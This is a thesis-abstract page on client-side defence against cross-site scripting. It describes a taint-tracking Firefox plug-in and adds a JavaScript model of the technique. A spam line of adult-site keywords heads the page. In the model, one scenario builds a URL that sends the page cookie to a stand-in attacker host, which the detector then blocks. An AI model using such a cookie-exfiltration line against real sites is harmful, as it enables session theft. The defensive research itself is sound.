天堂国产午夜亚洲专区-少妇人妻综合久久蜜臀-国产成人户外露出视频在线-国产91传媒一区二区三区

Research on Client-Side Defence Techniques against Cross-Site Scripting Attacks

Published: 2018-04-05 12:45

Topic: cross-site scripting attacks. Angle: browser security. Source: Beijing Jiaotong University, 2014 master's thesis.


【Abstract】: Cross-site scripting (XSS) is one of the most damaging and most common threats to today's Web applications. It stems from a weak link in Web application security: insufficient filtering of user input. Fixing XSS vulnerabilities on the server side would solve the problem at its root, but because security patches are slow to roll out and the security awareness of operations staff is weak, many Web applications still do not fix their vulnerabilities in time, leaving their users exposed to XSS attacks. To improve users' ability to actively defend against XSS, it is therefore necessary to study client-side XSS defences.

The main work of the thesis covers four aspects.

First, it reviews the current security situation of Web applications and analyses the client's existing security mechanisms and the risks it bears; these are the mechanisms that an XSS attack must challenge and overcome.

Second, it classifies XSS attacks by how they arise and summarises the characteristics of each type. It then summarises XSS vulnerability discovery techniques, including XSS encoding methods and techniques for bypassing defence strategies, and studies how XSS payloads are triggered within an HTML page.

Third, a virtual blog site is built on which cookie theft, XSS phishing and XSS worm attacks are demonstrated step by step with examples and their harm is verified. Keyboard monitoring, access to the local clipboard and other attack methods are discussed briefly.

Finally, since the main goal of an XSS attack is to steal the user's sensitive information, and its behavioural signature is sending that information to a third party without the user's authorisation, the thesis designs a new XSS defence method. It runs in the client browser with dynamic taint tracking as its primary mechanism, supplemented by static taint analysis; through taint tracking it monitors the transmission of sensitive information in the current page and warns the user when sensitive information is handled abnormally, thereby preventing the leakage of client-side sensitive information and effectively intercepting XSS attacks. By extending the JavaScript engine SpiderMonkey, a plug-in based on this method, xssCleaner, is implemented on the open-source Firefox browser, which verifies the effectiveness and feasibility of the defence method.
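The taint-tracking idea the abstract describes, as an added worked model that is not code from the thesis or its xssCleaner plug-in: sensitive values (the cookie) are marked at their source, the mark propagates through string operations, and a check at network sinks warns when marked data would leave the page's origin. The names Tainted, concat, encodeUri, checkSink and the page object are assumptions of this illustration, and the page object is a constructed stand-in for browser state.

```javascript
// A tainted string remembers which sensitive sources it was derived from.
class Tainted {
  constructor(value, sources) { this.value = String(value); this.sources = new Set(sources); }
  toString() { return this.value; }
}
const taintOf = (v) => (v instanceof Tainted ? v.sources : new Set());
const rawOf = (v) => (v instanceof Tainted ? v.value : String(v));

// Propagation: the result of a string operation is tainted if any input was.
function concat(...parts) {
  const sources = new Set();
  for (const p of parts) for (const s of taintOf(p)) sources.add(s);
  const raw = parts.map(rawOf).join('');
  return sources.size ? new Tainted(raw, sources) : raw;
}
function encodeUri(v) {
  const raw = encodeURIComponent(rawOf(v));
  return taintOf(v).size ? new Tainted(raw, taintOf(v)) : raw;
}

// Constructed stand-in for browser state (assumption: no real DOM in this model).
const page = {
  origin: 'https://blog.example',
  cookie: new Tainted('session=abc123', ['document.cookie']), // taint source
};

// Sink check, run before a request is issued (img.src, XHR, fetch, form submit):
// warn when data derived from a sensitive source would leave the page's origin.
function checkSink(url, body = '') {
  const dest = new URL(rawOf(url), page.origin);
  const sources = new Set([...taintOf(url), ...taintOf(body)]);
  const thirdParty = dest.origin !== page.origin;
  if (thirdParty && sources.size > 0) {
    return { allow: false, reason: `tainted data (${[...sources].join(', ')}) sent to ${dest.origin}` };
  }
  return { allow: true, reason: thirdParty ? 'third-party request carries no tainted data' : 'same-origin request' };
}

// Scenario 1: an injected script builds a cross-origin URL that carries the cookie.
const exfil = concat('https://attacker.example/c?d=', encodeUri(page.cookie));
const verdict1 = checkSink(exfil);                          // allow: false, warn the user

// Scenario 2: the site's own script sends the cookie to its own origin.
const verdict2 = checkSink('/api/session', page.cookie);    // allow: true

// Scenario 3: a third-party request that carries no sensitive data (e.g. a CDN asset).
const verdict3 = checkSink('https://cdn.example/lib.js');   // allow: true
```

The model flags only the combination "tainted data AND foreign destination", which is why ordinary third-party assets and same-origin submissions pass while the injected exfiltration is stopped.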
【Degree-granting institution】: Beijing Jiaotong University
【Degree level】: Master's
【Year granted】: 2014
【Classification number】: TP393.08

【Citing works】

Related master's theses (1 in total)

1 楊芮; Design and Implementation of a Web User Behaviour Data Collection and Statistics System [D]; Beijing Jiaotong University; 2015


Document number: 1714772


Link to this page: http://sikaile.net/guanlilunwen/ydhl/1714772.html



版權(quán)申明:資料由用戶a9082***提供,本站僅收錄摘要或目錄,作者需要刪除請E-mail郵箱bigeng88@qq.com